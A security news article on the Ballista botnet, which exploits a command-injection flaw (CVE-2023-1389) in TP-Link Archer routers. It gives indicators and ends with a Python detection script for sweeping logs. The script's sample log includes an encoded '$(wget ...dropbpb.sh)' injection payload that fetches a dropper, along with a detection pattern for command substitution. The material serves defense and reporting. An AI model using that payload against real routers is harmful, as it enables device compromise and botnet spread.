
New research from the Cato CTRL team shows that unpatched TP-Link Archer routers are the target of a new botnet campaign called Ballista.
"Botnets will automatically spread across the Internet by leveraging a remote code execution (RCE) vulnerability in TP-Link Archer routers (CVE-2023-1389)," the security researchers said in a technical report shared with The Hacker News.
CVE-2023-1389 is a high-severity security flaw affecting TP-Link Archer AX-21 routers. It allows command injection, which in turn can lead to remote code execution.
The earliest evidence of active exploitation of the flaw dates back to April 2023, when an unidentified threat actor used it to drop the Mirai botnet malware. Since then, it has been abused to propagate other malware families such as Condi and AndroxGh0st.

Cato CTRL said it detected the Ballista campaign on January 10, 2025. The most recent exploitation attempts were recorded on February 17, 2025.
The attack sequence involves a malware dropper, a shell script ("Dropbpb.sh") designed to fetch and execute the main binary on the target system for one of several architectures: MIPS, MIPSEL, ARMv5l, ARMv7l and x86_64.
Once executed, the malware establishes an encrypted command-and-control (C2) channel on port 82 in order to control the device.
"This allows running shell commands to carry out additional RCE and denial of service (DoS) attacks," the researchers said. "In addition, the malware attempts to read sensitive files on the local system."

Some of the supported commands are listed below -
- flooder, which triggers a flood attack
- exploiter, which exploits CVE-2023-1389
- start, an optional parameter used with exploiter to start the module
- a stop command, which halts the module-triggering function
- shell, which runs a Linux shell command on the local system
- killall, which is used to terminate the service
In addition, the malware can terminate previous instances of itself and erase its own presence once execution begins. It is also designed to spread to other routers by attempting to exploit the same flaw.

The location of the C2 IP address (2.237.57[.]70) and the presence of Italian-language strings in the malware binaries suggest the involvement of an unknown Italian threat actor, the cybersecurity company said.
That said, given that this IP address is no longer functional and that newer variants of the dropper use Tor network domains instead of a hardcoded IP address, the malware appears to be under active development.
A search on the attack surface management platform Censys revealed that more than 6,000 devices have been infected by Ballista. Infections are concentrated in Brazil, Poland, the U.K., Bulgaria and Türkiye.
The botnet is known to target manufacturing, healthcare, services and technology organizations in the United States, Australia, China and Mexico.
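The indicators the report gives for this campaign (the encrypted C2 channel on port 82, the dropbpb.sh dropper script and the C2 address 2.237.57[.]70) are enough to write a first-pass sweep over flow and HTTP logs. The script below is an added example, not code from Cato CTRL or from the Ballista sample. The log lines it runs over are constructed for the example, the flow-record layout and the combined-log-format sensor lines are assumptions, and the check for shell command substitution ("$(" or a backtick) in decoded request URIs is a heuristic the report does not state; it is included because the underlying flaw is command injection and a real deployment should tune it against local traffic.

```python
"""Sweep constructed flow and HTTP log lines for the Ballista indicators
named in the write-up: the C2 address, the TCP/82 C2 channel, the
dropbpb.sh dropper and shell command substitution in request URIs."""
import ipaddress
import re
from dataclasses import dataclass
from typing import Iterable, List
from urllib.parse import unquote_plus

# Indicators taken from the report above.
BALLISTA_C2_IP = "2.237.57.70"   # reported C2 address (defanged in the text)
BALLISTA_C2_PORT = 82            # port of the encrypted C2 channel
DROPPER_NAME = "dropbpb.sh"      # shell-script dropper, matched case-insensitively

# Assumption (not from the report): an exploitation attempt against the
# command-injection flaw carries shell command-substitution syntax in the
# query string. Only "$(" and backtick are matched; ";" is legitimate in
# LuCI-style paths and would be far too noisy.
CMD_SUBST = re.compile(r"\$\(|`")

# Destinations an outbound TCP/82 flow may reach without being flagged
# (RFC 1918 plus loopback); anything else on that port is suspicious.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# Constructed flow records: ts src sport dst dport proto
CONN_LOG = """\
1736499600.1 192.168.1.1 41832 2.237.57.70 82 tcp
1736499601.2 192.168.1.1 41833 93.184.216.34 443 tcp
1736499602.3 192.168.1.1 41834 198.51.100.7 82 tcp
1736499603.4 192.168.1.20 51000 10.0.0.5 82 tcp
"""

# Constructed combined-log-format lines from a sensor in front of the router:
# an inbound request with an encoded "$(wget ...)" payload, the router's own
# outbound fetch of the dropper, and a benign admin-UI request.
HTTP_LOG = """\
203.0.113.9 - - [10/Jan/2025:09:00:00 +0000] "GET /cgi-bin/luci/?q=%24%28wget+http%3A%2F%2F203.0.113.9%2Fdropbpb.sh%29 HTTP/1.1" 200 51
192.168.1.1 - - [10/Jan/2025:09:00:02 +0000] "GET http://203.0.113.9/dropbpb.sh HTTP/1.1" 200 1487
192.168.1.20 - - [10/Jan/2025:09:05:00 +0000] "GET /cgi-bin/luci/;stok=abc/admin/status HTTP/1.1" 200 1024
"""

HTTP_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})')


@dataclass(frozen=True)
class Finding:
    kind: str    # c2_ip | c2_port | dropper_fetch | cmd_injection
    detail: str


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def scan_conn(lines: Iterable[str]) -> List[Finding]:
    """Flag flows to the known C2 address and to external TCP/82 destinations."""
    found: List[Finding] = []
    for line in lines:
        parts = line.split()
        if len(parts) < 6:
            continue
        _ts, src, _sport, dst, dport, proto = parts[:6]
        flow = f"{src} -> {dst}:{dport}/{proto}"
        if dst == BALLISTA_C2_IP:
            found.append(Finding("c2_ip", flow))
        elif proto == "tcp" and dport == str(BALLISTA_C2_PORT) and not is_internal(dst):
            found.append(Finding("c2_port", flow))
    return found


def scan_http(lines: Iterable[str]) -> List[Finding]:
    """Flag dropper fetches and command substitution in decoded request URIs."""
    found: List[Finding] = []
    for line in lines:
        m = HTTP_RE.match(line)
        if not m:
            continue
        uri = unquote_plus(m["uri"])      # decode %24%28 -> "$(" before matching
        who = f'{m["src"]} {m["method"]} {uri}'
        if DROPPER_NAME in uri.lower():
            found.append(Finding("dropper_fetch", who))
        if CMD_SUBST.search(uri):
            found.append(Finding("cmd_injection", who))
    return found


def sweep(conn_log: str = CONN_LOG, http_log: str = HTTP_LOG) -> List[Finding]:
    return scan_conn(conn_log.splitlines()) + scan_http(http_log.splitlines())


if __name__ == "__main__":
    for f in sweep():
        print(f"{f.kind:14} {f.detail}")
```

Because the report notes that newer dropper variants replace the hardcoded address with Tor domains, the c2_ip match is the indicator that ages fastest; the port-82 and dropper-name checks, and any command-substitution hits against the router's admin interface, are the parts worth keeping in a detection rule.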
“The malware sample shares similarities with other botnets, but it’s different from widely used botnets like Mirai and Mozi,” the researchers said.